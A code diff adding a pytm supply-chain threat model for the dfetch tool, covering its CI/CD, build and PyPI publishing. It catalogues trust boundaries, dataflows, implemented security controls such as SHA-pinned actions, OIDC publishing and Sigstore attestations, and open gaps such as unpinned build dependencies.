+                "A repository contributor who introduces a malicious ``dfetch.yaml`` "
+                "change: redirecting a dep to an attacker-controlled URL, pointing "
+                "``dst:`` at a sensitive path, or embedding a credential-bearing URL.  "
+                "dfetch is not the control point for this threat; code review is the "
+                "intended mitigating boundary."
+            ),
+        ),
+    ]

--- a/security/tm_supply_chain.py
+++ b/security/tm_supply_chain.py
@@ -1,0 +1,808 @@
+# pylint: disable=too-many-lines
+"""Supply-chain threat model for dfetch.
+
+Scope: pre-install lifecycle - code contribution, CI/CD, build
+(wheel / sdist), PyPI distribution, and consumer installation.
+The installed dfetch package is the handoff point to ``tm_usage.py``.
+
+Run::
+
+    python -m security.tm_supply_chain --dfd
+    python -m security.tm_supply_chain --seq
+    python -m security.tm_supply_chain --report REPORT
+"""
+
+import os
+import sys
+
+# Ensure the security package is importable when loaded by Sphinx directive
+_repo_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+if _repo_root not in sys.path:
+    sys.path.insert(0, _repo_root)
+
+from pytm import (  # noqa: E402  # pylint: disable=wrong-import-position
+    TM,
+    Actor,
+    Boundary,
+    Classification,
+    Data,
+    Dataflow,
+    Datastore,
+    ExternalEntity,
+    Process,
+)
+
+from security.tm_common import (  # noqa: E402  # pylint: disable=wrong-import-position
+    THREATS_FILE,
+    Control,
+    ControlAssessment,
+    apply_report_utils_patch,
+    build_asset_controls_index,
+    make_attacker_profiles,
+    make_dev_env_boundary,
+    make_network_boundary,
+    make_supply_chain_assumptions,
+    run_model,
+)
+
+
+def _make_sc_boundaries() -> tuple[Boundary, Boundary, Boundary, Boundary]:
+    """Create and return supply-chain trust boundaries."""
+    b_dev = make_dev_env_boundary()
+    b_github = Boundary("GitHub Actions Infrastructure")
+    b_github.description = (
+        "Microsoft-operated ephemeral runners executing the CI/CD workflows.  "
+        "Egress traffic is blocked (``harden-runner`` with ``egress-policy: block``) "
+        "with an allowlist of permitted endpoints; ``ci.yml`` forwards only "
+        "explicitly named secrets to child workflows (``CODACY_PROJECT_TOKEN`` "
+        "to ``test.yml``, ``GH_DFETCH_ORG_DEPLOY`` to ``docs.yml``)."
+    )
+    b_pypi = Boundary("PyPI / TestPyPI")
+    b_pypi.description = (
+        "Python Package Index and its staging registry.  dfetch publishes via "
+        "OIDC trusted publishing - no long-lived API token stored."
+    )
+    b_net = make_network_boundary(
+        description=(
+            "Public internet - upstream package registries, PyPI, GitHub, CDN nodes, "
+            "and other external endpoints reachable by the CI/CD infrastructure."
+        )
+    )
+    return b_dev, b_github, b_pypi, b_net
+
+
+def _make_sc_actors_and_entities(
+    b_dev: Boundary,
+    b_github: Boundary,
+    b_pypi: Boundary,
+    b_net: Boundary,
+) -> tuple[Actor, Actor, ExternalEntity, ExternalEntity, ExternalEntity]:
+    """Create actors and external entities; return those referenced by dataflows."""
+    developer = Actor("Developer")
+    developer.inBoundary = b_dev
+    developer.description = (
+        "dfetch project contributor: writes code, reviews PRs, cuts releases.  "
+        "Trusted at workstation time; responsible for correct branch-protection "
+        "and release workflow configuration."
+    )
+    contributor = Actor("Contributor / Attacker")
+    contributor.inBoundary = b_net
+    contributor.description = (
+        "External contributor submitting pull requests, or an adversary attempting "
+        "supply-chain manipulation (malicious PR, action-poisoning, or MITM on CI "
+        "network traffic).  Code review, branch protection, and SHA-pinned Actions "
+        "are the primary controls at this boundary."
+    )
+    consumer = Actor("Consumer / End User")
+    consumer.inBoundary = b_dev
+    consumer.description = (
+        "Installs dfetch from PyPI (``pip install dfetch``) or from binary installer, "
+        "then invokes it on a developer workstation or in a CI pipeline.  "
+        "Can verify four complementary attestation types using ``gh attestation verify`` as "
+        "documented in the release-integrity guide (see C-026, C-039, C-040): "
+        "SBOM attestation on the PyPI wheel; SBOM, SLSA build provenance, and VSA on binary "
+        "installers; SLSA build provenance and in-toto test result attestation on the source archive."
+    )
+    gh_repository = ExternalEntity("A-01: GitHub Repository")
+    gh_repository.inBoundary = b_github
+    gh_repository.classification = Classification.RESTRICTED
+    gh_repository.description = (
+        "Source code, PRs, releases, and workflow definitions.  "
+        "GitHub Actions workflows (``.github/workflows/``) with "
+        "``contents:write`` permission can modify repository state and trigger releases."
+    )
+    gh_actions_runner = ExternalEntity("A-02: GitHub Actions Infrastructure")
+    gh_actions_runner.inBoundary = b_github
+    gh_actions_runner.classification = Classification.RESTRICTED
+    gh_actions_runner.description = (
+        "Microsoft-operated ephemeral runner executing CI/CD workflows.  "
+        "Egress policy is ``block`` with an explicit allowlist of permitted endpoints - "
+        "non-allowlisted outbound connections are blocked at the kernel level by "
+        "``step-security/harden-runner``."
+    )
+    pypi = ExternalEntity("A-03: PyPI / TestPyPI")
+    pypi.inBoundary = b_pypi
+    pypi.classification = Classification.PUBLIC
+    pypi.description = (
+        "Python Package Index.  dfetch is published via OIDC trusted publishing "
+        "(no long-lived API token).  Account takeover or registry compromise "
+        "would affect every consumer installing dfetch."
+    )
+    return contributor, consumer, gh_repository, gh_actions_runner, pypi
+
+
+def _make_sc_processes(b_github: Boundary) -> None:
+    """Create CI/CD process elements; all auto-register with TM."""
+    release_gate = Process("Release Gate / Code Review")
+    release_gate.inBoundary = b_github
+    release_gate.description = (
+        "Branch-protection rules and mandatory peer code review enforced before "
+        "merging to the default branch.  Controls privileged operations: PR merge, "
+        "direct push to main, and release-workflow trigger.  "
+        "A compromised maintainer account with merge rights bypasses peer review "
+        "and can trigger a malicious release without any automated block.  "
+        "No hardware-token MFA or mandatory second-maintainer approval for release "
+        "operations is currently enforced."
+    )
+    release_gate.controls.hasAccessControl = (
+        True  # branch protection and required reviews exist
+    )
+    release_gate.controls.isHardened = (
+        False  # account compromise bypasses the gate entirely
+    )
+    release_gate.controls.isCiPipeline = True  # CI/release pipeline gate
+    gh_actions_workflow = Process("GitHub Actions Workflow")
+    gh_actions_workflow.inBoundary = b_github
+    gh_actions_workflow.description = (
+        "CI/CD pipelines: test, build (wheel/msi/deb/rpm), lint, CodeQL, Scorecard, "
+        "dependency-review, docs, release.  "
+        "All actions pinned by commit SHA.  "
+        "harden-runner used in every workflow that executes steps on a runner "
+        "(egress: block with endpoint allowlist); ci.yml is a dispatcher-only workflow "
+        "with no runner steps and does not include harden-runner."
+    )
+    gh_actions_workflow.controls.isHardened = (
+        True  # SHA-pinned actions, harden-runner egress:block on all runner workflows
+    )
+    gh_actions_workflow.controls.providesIntegrity = (
+        True  # CodeQL + Scorecard + dependency-review
+    )
+    gh_actions_workflow.controls.hasAccessControl = (
+        True  # minimal permissions per workflow
+    )
+    gh_actions_workflow.controls.isCiPipeline = True  # CI/release pipeline
+    python_build = Process("Python Build (wheel / sdist)")
+    python_build.inBoundary = b_github
+    python_build.description = (
+        "Runs ``python -m build`` to produce wheel and sdist.  "
+        "Build deps (setuptools, build, fpm, gem) fetched from PyPI/RubyGems without "
+        "hash pinning.  SLSA provenance attestations are generated by the release "
+        "workflow."
+    )
+    python_build.controls.isHardened = (
+        False  # build deps installed without --require-hashes; see gap C-023
+    )
+    python_build.controls.isCiPipeline = True  # CI/release pipeline build step
+
+
+def _make_sc_datastores(b_github: Boundary, b_pypi: Boundary) -> Datastore:
+    """Create data assets; return gh_actions_cache (referenced by dataflows)."""
+    pypi_package = Datastore("A-04: dfetch PyPI Package")
+    pypi_package.inBoundary = b_pypi
+    pypi_package.description = (
+        "Published wheel and sdist on PyPI (https://pypi.org/project/dfetch/).  "
+        "Published via OIDC trusted publishing - no long-lived API token stored.  "
+        "A machine-readable CycloneDX SBOM is generated during the build and "
+        "published alongside the release.  "
+        "Compromise of the PyPI account or registry affects every consumer."
+    )
+    pypi_package.storesSensitiveData = False
+    pypi_package.hasWriteAccess = True  # publish pipeline writes new releases
+    pypi_package.isSQL = False
+    pypi_package.classification = Classification.SENSITIVE
+    pypi_package.controls.usesCodeSigning = (
+        True  # Sigstore SBOM attestation (actions/attest; predicate cyclonedx.org/bom)
+    )
+    pypi_package.controls.isHardened = (
+        True  # OIDC trusted publishing; no stored long-lived token
+    )
+    Data(
+        "A-05: PyPI OIDC Identity",
+        description=(
+            "GitHub OIDC token exchanged for a short-lived PyPI publish credential.  "
+            "No long-lived API token stored.  The token is scoped to the GitHub Actions "
+            "environment named ``pypi``.  "
+            "Risk: if the OIDC issuer or the PyPI trusted-publisher mapping is "
+            "misconfigured, an attacker could mint a valid publish token."
+        ),
+        classification=Classification.SECRET,
+        isCredentials=True,
+        isPII=False,
+        isStored=False,
+        isDestEncryptedAtRest=False,
+        isSourceEncryptedAtRest=True,
+    )
+    scorecard_results = Datastore("A-06: OpenSSF Scorecard Results")
+    scorecard_results.inBoundary = b_github
+    scorecard_results.description = (
+        "Weekly OSSF Scorecard SARIF results uploaded to GitHub Code Scanning.  "
+        "Covers: branch-protection, CI-tests, code-review, maintained, packaging, "
+        "pinned-dependencies, SAST, signed-releases, token-permissions, vulnerabilities, "
+        "dangerous-workflow, binary-artifacts, fuzzing, license, CII-best-practices, "
+        "security-policy, webhooks.  "
+        "Suppression or forgery hides supply-chain regressions."
+    )
+    scorecard_results.storesSensitiveData = False
+    scorecard_results.hasWriteAccess = (
+        True  # CI runner writes SARIF uploads here (DF-17)
+    )
+    scorecard_results.isSQL = False
+    scorecard_results.classification = Classification.RESTRICTED
+    scorecard_results.controls.providesIntegrity = (
+        True  # authenticated output from OSSF Scorecard action
+    )
+    dfetch_dev_deps = Datastore("A-07: dfetch Build / Dev Dependencies")
+    dfetch_dev_deps.inBoundary = b_github
+    dfetch_dev_deps.description = (
+        "Python packages installed during CI: setuptools, build, pylint, bandit, "
+        "mypy, pytest, etc.  Ruby gem ``fpm`` for platform builds.  "
+        "Installed via ``pip install .`` and ``pip install --upgrade pip build`` "
+        "without ``--require-hashes`` - a compromised PyPI mirror or BGP hijack "
+        "can substitute malicious build tools.  "
+        "``gem install fpm`` and ``choco install svn/zig`` are also not hash-verified."
+    )
+    dfetch_dev_deps.storesSensitiveData = False
+    dfetch_dev_deps.hasWriteAccess = False
+    dfetch_dev_deps.isSQL = False
+    dfetch_dev_deps.classification = Classification.RESTRICTED
+    gh_workflows = Datastore("A-08: GitHub Actions Workflows")
+    gh_workflows.inBoundary = b_github
+    gh_workflows.description = (
+        "``.github/workflows/*.yml`` - CI/CD configuration checked into the repository.  "
+        "11 workflows: ci, build, run, test, docs, release, python-publish, "
+        "dependency-review, codeql-analysis, scorecard, devcontainer.  "
+        "A malicious PR that modifies workflows can exfiltrate secrets or publish "
+        "a backdoored release.  "
+        "Mitigated by: SHA-pinned actions, persist-credentials:false, minimal permissions."
+    )
+    gh_workflows.storesSensitiveData = False
+    gh_workflows.hasWriteAccess = True  # PRs can modify .github/workflows/ definitions
+    gh_workflows.isSQL = False
+    gh_workflows.classification = Classification.RESTRICTED
+    gh_workflows.controls.isHardened = True
+    gh_workflows.controls.providesIntegrity = (
+        True  # branch protection + mandatory code review
+    )
+    gh_actions_cache = Datastore("A-08b: GitHub Actions Build Cache")
+    gh_actions_cache.inBoundary = b_github
+    gh_actions_cache.description = (
+        "GitHub Actions cache entries written and restored across pipeline runs.  "
+        "Used to speed up dependency installation (pip, gem) and incremental builds.  "
+        "Cache-poisoning from forked PRs (DFT-28, SLSA E6: poison the build cache) is "
+        "mitigated by ref-scoped cache keys: build.yml includes "
+        "``${{ github.ref_name }}`` in both ``key`` and ``restore-keys`` (C-033), "
+        "which isolates PR and release caches per branch so a fork cannot write into "
+        "the release cache namespace."
+    )
+    gh_actions_cache.storesSensitiveData = False
+    gh_actions_cache.hasWriteAccess = (
+        True  # both PR and release builds write to the cache
+    )
+    gh_actions_cache.isSQL = False
+    gh_actions_cache.classification = Classification.RESTRICTED
+    return gh_actions_cache
+
+
+def _make_sc_contrib_flows(
+    contributor: Actor,
+    consumer: Actor,
+    gh_repository: ExternalEntity,
+    pypi: ExternalEntity,
+) -> None:
+    """Create contributor- and consumer-facing dataflows; all auto-register with TM."""
+    df11 = Dataflow(contributor, gh_repository, "DF-11: Submit pull request")
+    df11.description = (
+        "External contributor opens a PR against the dfetch repository.  "
+        "Workflow files in ``.github/workflows/`` can be modified by PRs.  "
+        "``ci.yml`` only passes required repository secrets to the test and docs "
+        "workflows, preventing malicious PR steps from exfiltrating secrets."
+    )
+    df11.protocol = "HTTPS"
+    df11.controls.hasAccessControl = True
+    df11.controls.isHardened = (
+        True  # git commit SHAs provide content-addressable integrity
+    )
+    df11.controls.providesIntegrity = True
+    df14 = Dataflow(consumer, pypi, "DF-14: pip install dfetch")
+    df14.description = (
+        "Consumer installs dfetch from PyPI.  The installed wheel contains the dfetch "
+        "CLI; the handoff to the runtime-usage model occurs when the consumer invokes "
+        "dfetch with a manifest.  "
+        "The consumer can verify the SBOM (CycloneDX) attestation of the wheel using "
+        "``gh attestation verify`` with ``--predicate-type https://cyclonedx.org/bom`` "
+        "and cert-identity pinned to ``python-publish.yml`` (see C-026)."
+    )
+    df14.protocol = "HTTPS"
+    df14.controls.isEncrypted = True
+    df14.controls.isNetworkFlow = True
+
+
+def _make_sc_ci_flows(
+    gh_repository: ExternalEntity,
+    gh_actions_runner: ExternalEntity,
+    pypi: ExternalEntity,
+    gh_actions_cache: Datastore,
+) -> None:
+    """Create CI infrastructure dataflows; all auto-register with TM."""
+    df12 = Dataflow(gh_repository, gh_actions_runner, "DF-12: CI checkout and build")
+    df12.description = (
+        "GitHub Actions checks out source, installs deps, runs tests, lints, builds.  "
+        "``persist-credentials:false`` on all checkout steps.  "
+        "All third-party actions pinned by commit SHA."
+    )
+    df12.controls.isHardened = True
+    df12.controls.providesIntegrity = True
+    df13 = Dataflow(gh_actions_runner, pypi, "DF-13: Publish to PyPI (OIDC)")
+    df13.description = (
+        "On release event, wheel/sdist uploaded to PyPI via "
+        "``pypa/gh-action-pypi-publish``.  OIDC trusted publishing: no stored API token.  "
+        "Four attestation types are generated by the release pipeline and anchored in Sigstore: "
+        "SLSA build provenance, SBOM (CycloneDX), VSA (Verification Summary Attestation) on "
+        "binary installers, and in-toto test result attestation on the source archive."
+    )
+    df13.protocol = "HTTPS"
+    df13.controls.isEncrypted = True
+    df13.controls.isHardened = (
+        True  # OIDC token exchange; no long-lived credential in transit
+    )
+    df13.controls.providesIntegrity = (
+        True  # Sigstore SBOM attestation covers published artifacts
+    )
+    df13.controls.usesCodeSigning = True  # SBOM attestation via actions/attest
+    df18 = Dataflow(gh_actions_runner, gh_actions_cache, "DF-18: CI cache write")
+    df18.description = (
+        "GitHub Actions runner writes build cache entries (pip dependencies, gem packages, "
+        "incremental build outputs) to the shared cache.  "
+        "Cache keys in ``build.yml`` include ``${{ github.ref_name }}`` (C-033), isolating "
+        "PR and release cache namespaces so a fork PR cannot write into the release cache slot.  "
+        "Residual risk: if ref-scoped keys were removed or misconfigured, cache-poisoning "
+        "from forks would be possible (DFT-28, SLSA E6)."
+    )
+    df18.protocol = "HTTPS"
+    df18.controls.isEncrypted = True
+    df19 = Dataflow(gh_actions_cache, gh_actions_runner, "DF-19: CI cache restore")
+    df19.description = (
+        "GitHub Actions runner restores a previously written cache entry before "
+        "running build steps.  Ref-scoped cache keys (C-033) ensure a release-tag build "
+        "restores only entries written under the same ref, not those written by a less-privileged "
+        "PR workflow.  Residual risk: if ref-scoped keys were removed or misconfigured, the release "
+        "build could consume attacker-controlled artifacts."
+    )
+    df19.protocol = "HTTPS"
+    df19.controls.isEncrypted = True
+    df17 = Dataflow(
+        gh_actions_runner,
+        gh_repository,
+        "DF-17: CI write-back (SARIF / artifacts / cache)",
+    )
+    df17.description = (
+        "CI runner uploads artifacts back to the repository: SARIF results to GitHub "
+        "Code Scanning (CodeQL, Scorecard), release assets, and build cache.  "
+        "Suppression or falsification of SARIF uploads (A-06) would hide supply-chain "
+        "regressions from the security dashboard.  "
+        "Mitigated by: authenticated GitHub API (GITHUB_TOKEN scoped to ``security-events: write``), "
+        "SHA-pinned upload actions."
+    )
+    df17.protocol = "HTTPS"
+    df17.controls.isEncrypted = True
+    df17.controls.isHardened = (
+        True  # GITHUB_TOKEN is scoped; harden-runner blocks exfiltration
+    )
+    df17.controls.providesIntegrity = True
+    df17.controls.hasAccessControl = (
+        True  # GITHUB_TOKEN permission scoping per workflow
+    )
+
+
+def build_model() -> TM:
+    """Construct and return the supply-chain threat model."""
+    TM.reset()
+    apply_report_utils_patch()
+    model = TM(
+        "dfetch Supply Chain",
+        description=(
+            "Threat model for dfetch.  "
+            "Covers the pre-install lifecycle: code contribution, CI/CD, "
+            "build (wheel / sdist), PyPI distribution, and consumer installation.  "
+            "The installed dfetch package is the handoff point to tm_usage.py."
+        ),
+        isOrdered=True,
+        mergeResponses=True,
+        threatsFile=THREATS_FILE,
+    )
+    model.assumptions = make_supply_chain_assumptions() + make_attacker_profiles()
+    b_dev, b_github, b_pypi, b_net = _make_sc_boundaries()
+    contributor, consumer, gh_repository, gh_actions_runner, pypi = (
+        _make_sc_actors_and_entities(b_dev, b_github, b_pypi, b_net)
+    )
+    _make_sc_processes(b_github)
+    gh_actions_cache = _make_sc_datastores(b_github, b_pypi)
+    _make_sc_contrib_flows(contributor, consumer, gh_repository, pypi)
+    _make_sc_ci_flows(gh_repository, gh_actions_runner, pypi, gh_actions_cache)
+    return model
+
+
+# ── CONTROLS AND GAPS ────────────────────────────────────────────────────────
+
+CONTROLS: list[Control] = [
+    # ── Implemented controls ─────────────────────────────────────────────────
+    Control(
+        id="C-009",
+        name="Actions commit-SHA pinning",
+        assets=["A-08", "A-02"],
+        threats=["DFT-07"],
+        reference=".github/workflows/*.yml",
+        assessment=ControlAssessment(risk="High", stride=["Tampering"]),
+        description=(
+            "Every third-party GitHub Action is pinned to a full commit SHA, "
+            "preventing tag-mutable supply-chain substitution."
+        ),
+    ),
+    Control(
+        id="C-010",
+        name="OIDC trusted publishing",
+        assets=["A-05", "A-04"],
+        threats=["DFT-07"],
+        reference=".github/workflows/python-publish.yml",
+        assessment=ControlAssessment(
+            risk="High", stride=["Spoofing", "Elevation of Privilege"]
+        ),
+        description=(
+            "PyPI publishes via ``pypa/gh-action-pypi-publish`` with "
+            "``id-token: write`` and no stored long-lived API token."
+        ),
+    ),
+    Control(
+        id="C-011",
+        name="Minimal workflow permissions",
+        assets=["A-08"],
+        threats=["DFT-07"],
+        reference=".github/workflows/*.yml",
+        assessment=ControlAssessment(risk="Medium", stride=["Elevation of Privilege"]),
+        description=(
+            "Each workflow declares only the permissions it requires "
+            "(default ``contents: read``)."
+        ),
+    ),
+    Control(
+        id="C-012",
+        name="persist-credentials: false",
+        assets=["A-08", "A-01"],
+        threats=["DFT-07"],
+        reference=".github/workflows/*.yml",
+        assessment=ControlAssessment(
+            status="implemented", risk="Medium", stride=["Information Disclosure"]
+        ),
+        description=(
+            "``persist-credentials: false`` is set on all checkout steps across "
+            "all workflows that run on a runner.  The GitHub token is not persisted "
+            "in the working tree after checkout."
+        ),
+    ),
+    Control(
+        id="C-013",
+        name="Harden-runner (egress block)",
+        assets=["A-08", "A-02"],
+        threats=["DFT-07", "DFT-29"],
+        reference=".github/workflows/*.yml",
+        assessment=ControlAssessment(
+            risk="High", stride=["Information Disclosure", "Tampering"]
+        ),
+        description=(
+            "``step-security/harden-runner`` is used in every workflow with "
+            "``egress-policy: block`` and an allowlist of permitted endpoints.  "
+            "All non-allowlisted outbound connections are blocked."
+        ),
+    ),
+    Control(
+        id="C-014",
+        name="OpenSSF Scorecard",
+        assets=["A-01", "A-06"],
+        threats=["DFT-07", "DFT-10"],
+        reference=".github/workflows/scorecard.yml",
+        assessment=ControlAssessment(risk="Low", stride=["Tampering"]),
+        description=(
+            "Weekly OSSF Scorecard analysis uploaded to GitHub Code Scanning "
+            "covers the full set of OpenSSF Scorecard checks."
+        ),
+    ),
+    Control(
+        id="C-015",
+        name="CodeQL static analysis",
+        assets=["A-01", "A-08"],
+        threats=["DFT-03", "DFT-06"],
+        reference=".github/workflows/codeql-analysis.yml",
+        assessment=ControlAssessment(
+            risk="Medium", stride=["Tampering", "Elevation of Privilege"]
+        ),
+        description=(
+            "CodeQL scans the Python codebase for security vulnerabilities on "
+            "pushes and pull requests targeting ``main``, and on a weekly cron schedule."
+        ),
+    ),
+    Control(
+        id="C-016",
+        name="Dependency review",
+        assets=["A-07"],
+        threats=["DFT-10"],
+        reference=".github/workflows/dependency-review.yml",
+        assessment=ControlAssessment(risk="Medium", stride=["Tampering"]),
+        description=(
+            "``actions/dependency-review-action`` checks for known vulnerabilities "
+            "in newly added dependencies on every pull request."
+        ),
+    ),
+    Control(
+        id="C-017",
+        name="bandit security linter",
+        assets=["A-01"],
+        threats=["DFT-03", "DFT-06"],
+        reference="pyproject.toml",
+        assessment=ControlAssessment(
+            risk="Low", stride=["Tampering", "Elevation of Privilege"]
+        ),
+        description=(
+            "``bandit -r dfetch`` runs in CI to detect common Python security issues."
+        ),
+    ),
+    Control(
+        id="C-021",
+        name="Sigstore SBOM attestation",
+        assets=["A-04"],
+        threats=["DFT-05"],
+        assessment=ControlAssessment(risk="Medium", stride=["Spoofing", "Tampering"]),
+        description=(
+            "The release pipeline generates CycloneDX SBOM attestations via "
+            "``actions/attest`` with Sigstore signatures.  These attest the software "
+            "composition (SBOM) of the published packages using predicate type "
+            "``https://cyclonedx.org/bom``."
+        ),
+    ),
+    Control(
+        id="C-022",
+        name="CycloneDX SBOM on PyPI",
+        assets=["A-04", "A-07"],
+        threats=["DFT-02"],
+        assessment=ControlAssessment(risk="Low", stride=["Repudiation"]),
+        description=(
+            "A CycloneDX SBOM is generated during the build and published "
+            "alongside the PyPI release, satisfying CRA Article 13 requirements."
+        ),
+    ),
+    Control(
+        id="C-024",
+        name="``secrets: inherit`` scope",
+        assets=["A-08", "A-05"],
+        threats=["DFT-07"],
+        assessment=ControlAssessment(risk="Medium", stride=["Information Disclosure"]),
+        description=(
+            "``ci.yml`` only passes required repository secrets to the test and "
+            "docs workflows, preventing malicious PR steps from exfiltrating "
+            "unrelated secrets."
+        ),
+    ),
+    Control(
+        id="C-026",
+        name="Consumer-side package provenance verification",
+        assets=["A-04"],
+        threats=["DFT-17", "DFT-25"],
+        assessment=ControlAssessment(
+            status="implemented", risk="Medium", stride=["Spoofing", "Tampering"]
+        ),
+        reference="doc/tutorials/installation.rst#verifying-release-integrity",
+        description=(
+            "Consumers installing dfetch via ``pip install dfetch`` have access to "
+            "documented procedures to verify the SBOM (CycloneDX) attestation of the "
+            "PyPI wheel using the GitHub CLI (``gh attestation verify``).  "
+            "Consumers installing binary packages (deb, rpm, pkg, msi) can verify "
+            "SLSA build provenance, SBOM, and VSA attestations.  "
+            "Consumers working from source can verify SLSA build provenance and in-toto "
+            "test result attestations on the source archive.  "
+            "Platform-specific instructions for Linux, macOS, and Windows are provided "
+            "in ``doc/howto/verify-integrity.rst``.  "
+            "This is an interim mitigation pending PEP 740 built-in support in pip.  "
+            "Without this documentation, a compromised PyPI account, namespace-squatting, "
+            "or dependency-confusion could serve malicious code undetected (DFT-17).  "
+            "An attacker controlling the release pipeline could publish a plausible "
+            "attestation alongside a backdoored wheel (DFT-25).  "
+            "By providing clear, copy-paste instructions, we enable security-conscious "
+            "consumers to verify provenance before installation."
+        ),
+    ),
+    Control(
+        id="C-032",
+        name="Consumer attestation verification pins to release tag ref",
+        assets=["A-08", "A-04"],
+        threats=["DFT-27"],
+        reference="doc/tutorials/installation.rst",
+        assessment=ControlAssessment(
+            status="implemented", risk="Medium", stride=["Tampering", "Spoofing"]
+        ),
+        description=(
+            "All ``gh attestation verify`` commands in the installation guide use "
+            "``--cert-identity`` pinned to the release workflow at a specific version "
+            "tag (e.g. ``...python-publish.yml@refs/tags/v<version>`` for pip packages, "
+            "``...build.yml@refs/tags/v<version>`` for binary installers) combined "
+            "with ``--cert-oidc-issuer https://token.actions.githubusercontent.com``.  "
+            "This rejects attestations produced by any workflow or branch other than "
+            "the expected release workflow on an official version tag.  "
+            "A build from an unofficial fork or unprotected branch would produce an "
+            "attestation with a different cert-identity and fail verification."
+        ),
+    ),
+    Control(
+        id="C-033",
+        name="Ref-scoped build cache keys isolate PR and release builds",
+        assets=["A-08b"],
+        threats=["DFT-28"],
+        reference=".github/workflows/build.yml",
+        assessment=ControlAssessment(
+            status="implemented", risk="High", stride=["Tampering"]
+        ),
+        description=(
+            "ccache and clcache keys in ``build.yml`` include ``${{ github.ref_name }}`` "
+            "so cache entries written by a pull-request build are scoped to the PR's "
+            "branch name and cannot be restored by a release-tag build.  "
+            "A malicious fork PR step cannot pre-populate a cache slot that the release "
+            "workflow will restore, because the release tag name is not reachable from "
+            "the PR's branch ref."
+        ),
+    ),
+    Control(
+        id="C-038",
+        name="Ancestry enforcement on dfetch main branch",
+        assets=["A-01"],
+        threats=["DFT-33"],
+        reference=".github/workflows/",
+        assessment=ControlAssessment(
+            status="implemented", risk="Low", stride=["Tampering"]
+        ),
+        description=(
+            "GitHub branch-protection rules on the dfetch ``main`` branch prohibit "
+            "force-pushes, satisfying the SLSA Source Level 2 ancestry-enforcement "
+            "requirement.  The immutable revision lineage of the main branch is "
+            "preserved: no contributor can rewrite history and orphan a "
+            "previously-audited commit SHA.  Consumers who pin to a dfetch commit SHA "
+            "can rely on that SHA remaining reachable indefinitely."
+        ),
+    ),
+    Control(
+        id="C-039",
+        name="Source build provenance and VSA attestations",
+        assets=["A-01", "A-02", "A-04"],
+        threats=["DFT-31", "DFT-25"],
+        reference="doc/howto/verify-integrity.rst",
+        assessment=ControlAssessment(
+            status="implemented",
+            risk="High",
+            stride=["Spoofing", "Tampering", "Repudiation"],
+        ),
+        description=(
+            "Every dfetch release ships two complementary Sigstore-signed attestations "
+            "that together let consumers trace the full source → binary chain.  "
+            "SLSA build provenance (``source-provenance.yml``) on the source archive proves "
+            "the archive was produced from the official tagged commit by the official CI "
+            "workflow, recording the exact inputs used at build time.  "
+            "A Verification Summary Attestation (VSA, ``build.yml``) on binary installers "
+            "records that the source archive was itself attested and verified before the "
+            "binary was produced, linking source-level trust to the installed package.  "
+            "Both are signed by GitHub Actions via Sigstore and can be verified using "
+            "``gh attestation verify`` with ``--predicate-type https://slsa.dev/provenance/v1`` "
+            "or ``--predicate-type https://slsa.dev/verification_summary/v1`` respectively.  "
+            "This substantially mitigates DFT-31 (consumers now have attestations to verify "
+            "against) and DFT-25 (forged provenance would fail Sigstore verification).  "
+            "The remaining gap (no formal SLSA Source Level attestation of governance "
+            "controls) is tracked in C-037."
+        ),
+    ),
+    Control(
+        id="C-040",
+        name="Test result attestation on source archive",
+        assets=["A-01", "A-02"],
+        threats=["DFT-31"],
+        reference=".github/workflows/test.yml",
+        assessment=ControlAssessment(
+            status="implemented", risk="Medium", stride=["Repudiation", "Tampering"]
+        ),
+        description=(
+            "The CI test workflow (``test.yml``) generates an in-toto test result "
+            "attestation (predicate type ``https://in-toto.io/attestation/test-result/v0.1``) "
+            "for every release and main-branch commit.  "
+            "The attestation proves the full CI test suite ran against the exact source "
+            "archive and every check passed, before any binary was produced from that source.  "
+            "Consumers can verify it using "
+            "``gh attestation verify dfetch-source.tar.gz`` with "
+            "``--predicate-type https://in-toto.io/attestation/test-result/v0.1`` and "
+            "``--cert-identity`` pinned to ``test.yml`` at the release tag ref.  "
+            "This provides an additional layer of assurance beyond build provenance: "
+            "not only was the artifact produced from the official commit, but the test "
+            "suite demonstrably passed on that exact source before any binary was built."
+        ),
+    ),
+    # ── Gaps ─────────────────────────────────────────────────────────────────
+    Control(
+        id="C-023",
+        name="Build deps without hash pinning",
+        assets=["A-07"],
+        threats=["DFT-10"],
+        assessment=ControlAssessment(status="gap", risk="High", stride=["Tampering"]),
+        description=(
+            "``pip install .`` and ``pip install --upgrade pip build`` in CI do not "
+            "use ``--require-hashes``.  A compromised PyPI mirror can substitute "
+            "malicious build tooling."
+        ),
+    ),
+    Control(
+        id="C-037",
+        name="No formal SLSA Source Level attestation of repository governance controls",
+        assets=["A-01"],
+        threats=["DFT-31"],
+        assessment=ControlAssessment(
+            status="gap", risk="Low", stride=["Repudiation", "Spoofing"]
+        ),
+        description=(
+            "dfetch now publishes SLSA build provenance for source archives, VSAs for "
+            "binary installers (C-039), and in-toto test result attestations (C-040).  "
+            "These close the 'no attestation to verify against' concern: consumers can "
+            "cryptographically verify the artifact chain.  "
+            "The remaining, narrower gap is that dfetch does not publish formal SLSA "
+            "Source Provenance Attestations generated by a SLSA Source Generator — "
+            "attestations that would prove the specific source-level governance controls "
+            "applied on each commit (branch protection, mandatory code review, ancestry "
+            "enforcement).  "
+            "C-038 establishes that ancestry enforcement is in place and C-026 documents "
+            "what consumers can verify; the gap is in machine-readable, verifiable "
+            "proof of those governance controls rather than the controls themselves.  "
+            "Risk is Low: the missing piece is a formal SLSA Source Level certificate "
+            "(per the SLSA Source Track spec) rather than the absence of any assurance.  "
+            "Fix: publish Source Provenance Attestations via "
+            "``slsa-framework/slsa-source-corroborator`` or equivalent on each push to main."
+        ),
+    ),
+    Control(
+        id="C-025",
+        name="No hardware-token MFA for release operations",
+        assets=["A-01", "A-04"],
+        threats=["DFT-11"],
+        assessment=ControlAssessment(
+            status="gap", risk="High", stride=["Spoofing", "Elevation of Privilege"]
+        ),
+        description=(
+            "No hardware-token (FIDO2/WebAuthn) MFA or mandatory second-approver "
+            "sign-off is required for accounts with merge or release-trigger rights.  "
+            "A compromised maintainer account - via phishing, credential stuffing, or "
+            "SMS-TOTP bypass - can merge a backdoored PR and trigger the release "
+            "workflow without any automated block.  "
+            "Enforce FIDO2 MFA on all accounts with merge rights and add a required "
+            "reviewer to the ``pypi`` deployment environment."
+        ),
+    ),
+]
+
+_SUPPLY_CHAIN_ASSET_IDS = {
+    "A-01",
+    "A-02",
+    "A-03",
+    "A-04",
+    "A-05",
+    "A-06",
+    "A-07",
+    "A-08",
+    "A-08b",
+}
